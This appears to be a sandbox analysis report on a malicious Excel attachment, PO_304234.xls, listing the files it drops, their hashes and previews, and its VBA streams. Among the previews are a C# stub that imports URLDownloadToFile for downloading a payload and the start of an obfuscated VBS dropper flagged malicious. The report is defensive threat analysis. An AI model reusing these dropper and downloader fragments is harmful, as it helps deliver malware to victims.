                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3072
                                                      Entropy (8bit):2.836338550855512
                                                      Encrypted:false
                                                      SSDEEP:24:etGS6PBG5eAdF8m3Bkr19F/ntkZf4sY7XMEWI+ycuZhNTakSFPNnq:65sAdemevF/WJ4sY7XMn1ulTa3fq
                                                      MD5:F23FC5F3620553DA03F222DA6F57C22B
                                                      SHA1:B9DAFB862DDEAAF3D630E67EC2E4D28D21842696
                                                      SHA-256:4ADEF1A2C0167F52D690F660918BD6B7B8566C633E550830E7263D552DBDDA7C
                                                      SHA-512:0C0FF10C144D773595360DCC53749EE75C367AA66DC9311B1854D3ADEF59D4DEC5E0547AD75B0946CD89426F5CF5B99B3233A35695BAF48DCD428C4FF5C858F2
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....y.....y...........................#.............. >.....P ......P.........V.....Y.....^.....g.....s...P.....P...!.P.....P.......!.....*.......>.......................................'..........<Module>.im

                                                      C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.out

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                      Category:modified
                                                      Size (bytes):866
                                                      Entropy (8bit):5.33029523093305
                                                      Encrypted:false
                                                      SSDEEP:24:AId3ka6Kzl3nrO0Eol3nrO7KaMD5DqBVKVrdFAMBJTH:Akka601nq0Eo1nq7KdDcVKdBJj
                                                      MD5:2947832763BF005B128C90D388329669
                                                      SHA1:F7D30E812F1CE5B0D5D8A3C0FCD1E97351ABA2B0
                                                      SHA-256:DAF5C1C431CFE3A973E8CAE140F448887494B70CE36AB2904BB741A21CF9AF26
                                                      SHA-512:649689B934F1ABC32B0FE7564CD017596B8894CDF2BF24D74563017000D7C177CF774BECEC750E8B9CA27284AA483F0BF086700CBF8DBA20C0A1E2026AABE918
                                                      Malicious:false
                                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                      C:\Users\user\AppData\Local\Temp\lblvpikr.ff1.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:MSVC .res
                                                      Category:dropped
                                                      Size (bytes):652
                                                      Entropy (8bit):3.086541143388619
                                                      Encrypted:false
                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykak7YnqqqPN5Dlq5J:+RI+ycuZhNCakSqPNnqX
                                                      MD5:AEDE579309AA9D8F1A51E23FE6FBA2BB
                                                      SHA1:A0B872E24BCA228C72BA1C2A09C2258F3F50770E
                                                      SHA-256:190AFF53A667DC96445FF5332547F71996C834F93A627DF8F8CED118AA219E22
                                                      SHA-512:8D4E3749B83AB7B6962F2A87ADA7DDAB14A44229A12A5609093FD112B0B2342B78C91CBE19783482AF37920AA045936C43E6B07BB2C6111010678F5D548717D1
                                                      Malicious:false
                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.j.o.4.t.j.0.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.j.o.4.t.j.0.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                      C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.0.cs

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
                                                      Category:dropped
                                                      Size (bytes):469
                                                      Entropy (8bit):3.9168776922580797
                                                      Encrypted:false
                                                      SSDEEP:6:V/DsYLDS81zun8cqZNVMm7tQXReKJ8SRHy4HmvmKlW0Dbme2Oi1mYy:V/DTLDfuGZeXfHav3DuOvYy
                                                      MD5:F347D2095BBABC6430C3479994132BB6
                                                      SHA1:DA6356149A945F87B97115EB29A0A6B665A4862C
                                                      SHA-256:053B79EC2FB6EB79BFC39B418EF150F58F21132501130910976F79C4B99AD5BC
                                                      SHA-512:57DA6A9EF5099DA3A8041BA16B3161A3669FC49F1B95C89C2096B946F926A7516CF1041D2481B7E36D7F874AE02F72F13F4BA2573710B96C184CD2D4629D6630
                                                      Malicious:false
                                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace MAg.{. public class vQwQONIjUcm. {. [DllImport("UrLMOn.DLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr vE,string tbBn,string zCrVCZth,uint jKFGSfwvaiR,IntPtr MnTOq);.. }..}.

                                                      C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):369
                                                      Entropy (8bit):5.222130447266008
                                                      Encrypted:false
                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f6KWzxs7+AEszIP23f6KAAn:p37Lvkmb6KzSKWWZEoSKAA
                                                      MD5:C9837710331152B46531F33BAE37FA1F
                                                      SHA1:AF6FA70216F8A5CC47D2E32A781EB9646978CA68
                                                      SHA-256:D01CF0A290E47E3E1DD3559637075FCDCDC0B9F6973B039FC16B3796B6833CD2
                                                      SHA-512:2E02154E67C4F9E6071E25F57B2E0C4410DCB19E43D7C289F9ED178E754FCCA2CACDAB657982C2899FF42062A8D002B2F36D3AF7F90D586B4C9074AEC332EBCA
                                                      Malicious:false
                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.0.cs"

                                                      C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.dll

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3072
                                                      Entropy (8bit):2.8403742403951004
                                                      Encrypted:false
                                                      SSDEEP:24:etGSpPBG5eAdF8m3Bkr1+/ntkZfI2MEWI+ycuZhNCakSqPNnq:6CsAdeme8/WJI2Mn1ulCa3Gq
                                                      MD5:E5895AC5E4C5DE379173C19CC2E7A128
                                                      SHA1:4EC1675A6B337E7C8C6D13072D6C05588861A34B
                                                      SHA-256:FB050319AE0415C5FD14E531B10AADEEA6A8A4D9526C23754199F29BE0CE51C6
                                                      SHA-512:F38653C4E14B3D0B9C8655269E37D998F4B0D0784835275EE082E77318EE64913DF7857BB3EAA480D4CF34E0D903357F4F441F70C1D7E61ECBBA9CD87D99A31E
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....y.....y...........................#.............. >.....P ......P.........V.....Y.....^.....g.....s...P.....P...!.P.....P.......!.....*.......>.......................................'..........<Module>.mj

                                                      C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.out

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                      Category:modified
                                                      Size (bytes):866
                                                      Entropy (8bit):5.341783564726212
                                                      Encrypted:false
                                                      SSDEEP:24:AId3ka6KzSGEoSj1KaMD5DqBVKVrdFAMBJTH:Akka60dEoMKdDcVKdBJj
                                                      MD5:47DF36512066F32452BE222776E3183E
                                                      SHA1:7535179A29FDC858D16A54DB075E62D14B17ED86
                                                      SHA-256:C4FEC020EAA479DF535FB36A4E0C22F846FD178713EAE5B1CB177A93D8C5C93F
                                                      SHA-512:80F5D5BAFA58D7620647C984549174BBADBECB3573AEAAE8409D82ACEF6AE38102478A0F2DB0DC064AB5301B0949D242616DCD336297A276D586C7F6B65B19C8
                                                      Malicious:false
                                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                      C:\Users\user\AppData\Local\Temp\tx55osgy.rqb.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\wv5ktyxq.nn1.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\wx0aguex.ze2.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\~DF0756C079363CCFBF.TMP

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\~DF50002C428033D926.TMP

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\~DFA39F7CCAE0ED4456.TMP

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):182074
                                                      Entropy (8bit):3.839212582497392
                                                      Encrypted:false
                                                      SSDEEP:3072:hGhbpF6rvZuVP8rpnVoipBqWxpgt5pfGwLU40y7ND3/Mua+LhrNkY:whKrvcVUrJVocBFSUAD30j+L9+Y
                                                      MD5:825926FCCB7DEBB08441E8DCD4963411
                                                      SHA1:D6299F30A8C04F8AAC1650F118443756E4EFFD4A
                                                      SHA-256:28185883247F149D31E10069DE858A3B3C7026E57D4C0D7DCAE1D87204D4573D
                                                      SHA-512:0BBFA440423715751AC5DFCAD1094058C469496C603B3358CD07BC725BCBF340BEB69D5B4676C0BE100E3E1BB231952D85989413A283C3B03613C09B96F1DBFF
                                                      Malicious:true
                                                      Preview:......P.C.A.z.b.L.L.P.z.i. .=. .".j.e.i.G.W.R.W.o.K.c.".....t.c.H.c.Z.k.t.B.W.R. .=. .".K.W.e.x.z.A.G.c.L.r.".....W.W.W.T.S.i.S.P.q.i. .=. .".p.s.n.i.Z.c.a.K.i.A.".....e.B.m.j.Z.B.r.H.k.W. .=. .".B.c.o.k.Z.t.B.W.R.t.".....b.p.A.L.Z.B.G.C.c.p. .=. .".o.W.W.Z.k.G.d.K.p.T.".....L.Z.A.L.u.i.H.x.p.G. .=. .".W.C.h.p.L.W.K.a.W.G.".....L.p.S.I.z.k.O.d.L.t. .=. .".W.Z.K.A.U.i.d.U.K.b.".........A.N.c.H.i.U.G.n.P.p. .=. .".d.U.e.Q.e.c.P.b.L.N.".....Q.N.K.G.h.C.O.t.K.H. .=. .".t.n.e.A.L.Q.f.K.G.u.".....s.L.i.r.z.L.b.Z.m.h. .=. .".L.H.f.N.f.p.c.q.i.n.".....K.Z.u.K.m.c.L.m.j.W. .=. .".i.f.P.Z.u.l.u.W.R.k.".....z.q.m.A.K.G.t.m.h.m. .=. .".z.n.z.d.W.k.l.L.L.d.".....L.B.m.O.x.f.f.B.c.L. .=. .".C.i.x.S.f.v.W.k.b.s.".....G.t.U.n.o.L.O.h.c.i. .=. .".n.S.J.W.Z.f.v.d.x.T.".....G.L.t.L.W.R.J.K.A.K. .=. .".i.W.P.A.I.t.b.c.W.u.".....k.N.U.U.G.N.p.b.o.Q. .=. .".m.L.k.U.L.N.N.A.L.b.".....c.L.i.b.Q.G.Z.L.Q.K. .=. .".O.c.R.c.z.B.P.C.T.n.".........h.W.H.s.d.H.g.p.t.e. .=. .".u.U.e.i.R.R.R.W.u.d.".....O.u.f.c.L.H.o.

                                                      C:\Users\user\Desktop\A7130000

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:56:44 2024, Security: 1
                                                      Category:dropped
                                                      Size (bytes):559616
                                                      Entropy (8bit):7.981720439023974
                                                      Encrypted:false
                                                      SSDEEP:12288:N+/nZ4GG3Ua/HWgDdfSeh3x/2V9JfKBFhBzwi5KSNp7JSJvOjD:NCSGYUuWWBh3x/2fJf4fJKSfEtS
                                                      MD5:46FF12BF43C6EC84745A3BEA9B2B0E1D
                                                      SHA1:43299B8EFCE1B176321DB218A475AB0B812D2123
                                                      SHA-256:68D8B84AE96164B511DC09162A5DB8E2873E33AD9968086B17FD8D452A2ED954
                                                      SHA-512:7FEF61C25D289424CCEA60815338456020ACC901968EBC61201EDBCA45FC7ABDFF18FEBFF459A132133F184E7B00534373AD48645030B153436D9CCB43636F36
                                                      Malicious:false
                                                      Preview:......................>...................................)...................l.......n.......p.......r...............................................................................................................................................................................................................................................................................................................................................................................................................................B................................................................................................................... ...!..."...#...$...%...&...'...(...........+...C...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...m.......n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                      C:\Users\user\Desktop\A7130000:Zone.Identifier

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\user\Desktop\PO_304234.xls (copy)

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:56:44 2024, Security: 1
                                                      Category:dropped
                                                      Size (bytes):559616
                                                      Entropy (8bit):7.981720439023974
                                                      Encrypted:false
                                                      SSDEEP:12288:N+/nZ4GG3Ua/HWgDdfSeh3x/2V9JfKBFhBzwi5KSNp7JSJvOjD:NCSGYUuWWBh3x/2fJf4fJKSfEtS
                                                      MD5:46FF12BF43C6EC84745A3BEA9B2B0E1D
                                                      SHA1:43299B8EFCE1B176321DB218A475AB0B812D2123
                                                      SHA-256:68D8B84AE96164B511DC09162A5DB8E2873E33AD9968086B17FD8D452A2ED954
                                                      SHA-512:7FEF61C25D289424CCEA60815338456020ACC901968EBC61201EDBCA45FC7ABDFF18FEBFF459A132133F184E7B00534373AD48645030B153436D9CCB43636F36
                                                      Malicious:true
                                                      Preview:......................>...................................)...................l.......n.......p.......r...............................................................................................................................................................................................................................................................................................................................................................................................................................B................................................................................................................... ...!..."...#...$...%...&...'...(...........+...C...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...m.......n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                      Static File Info

                                                      General

                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 02:26:14 2024, Security: 1
                                                      Entropy (8bit):7.95888682247645
                                                      TrID:
                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                      File name:PO_304234.xls
                                                      File size:569'344 bytes
                                                      MD5:ac30e3d8b0557592e89bdca3e6b4e879
                                                      SHA1:d484bca1c79af754eced69d18348c2a5e8cbe325
                                                      SHA256:adf8f2babc9a03e459102fd4290645fd46ae83f3001e581a7735f592449fd421
                                                      SHA512:35c7bbace367dca74bf6f80352237e8ab426efc643735e4f5cd0cefd917efb73af3915b621b8ee9e6190ffb5559562e0d7edd88468a861c5ea1ff8de976118ba
                                                      SSDEEP:12288:g+XRb0e93WNXplTiFFhzxgq5lBfh9HK3R2XetknutN2TeqQ:gIRQxFqFrgq5PfnHhet9N2+
                                                      TLSH:4DC422093AD8CF53D60727BA0DE8E9970601FE249F66868BB584772E0F7D752F853602
                                                      File Content Preview:........................>...................................)...................l.......n.......p.......r......................................................................................................................................................

                                                      File Icon

                                                      Icon Hash:276ea3a6a6b7bfbf

                                                      Static OLE Info

                                                      General

                                                      Document Type:OLE
                                                      Number of OLE Files:1

                                                      OLE File "PO_304234.xls"

                                                      Indicators
                                                      Has Summary Info:
                                                      Application Name:Microsoft Excel
                                                      Encrypted Document:True
                                                      Contains Word Document Stream:False
                                                      Contains Workbook/Book Stream:True
                                                      Contains PowerPoint Document Stream:False
                                                      Contains Visio Document Stream:False
                                                      Contains ObjectPool Stream:False
                                                      Flash Objects Count:0
                                                      Contains VBA Macros:True
                                                      Summary
                                                      Code Page:1252
                                                      Author:
                                                      Last Saved By:
                                                      Create Time:2006-09-16 00:00:00
                                                      Last Saved Time:2024-08-28 01:26:14
                                                      Creating Application:Microsoft Excel
                                                      Security:1
                                                      Document Summary
                                                      Document Code Page:1252
                                                      Thumbnail Scaling Desired:False
                                                      Contains Dirty Links:False
                                                      Shared Document:False
                                                      Changed Hyperlinks:False
                                                      Application Version:786432

                                                      Streams with VBA

                                                      VBA File Name: Sheet1.cls, Stream Size: 977
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                      VBA File Name:Sheet1.cls
                                                      Stream Size:977
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 cf 24 89 a1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      VBA Code
                                                      Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                      VBA File Name: Sheet2.cls, Stream Size: 977
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                      VBA File Name:Sheet2.cls
                                                      Stream Size:977
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ ? 4 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 cf 24 3f 34 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      VBA Code
                                                      Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
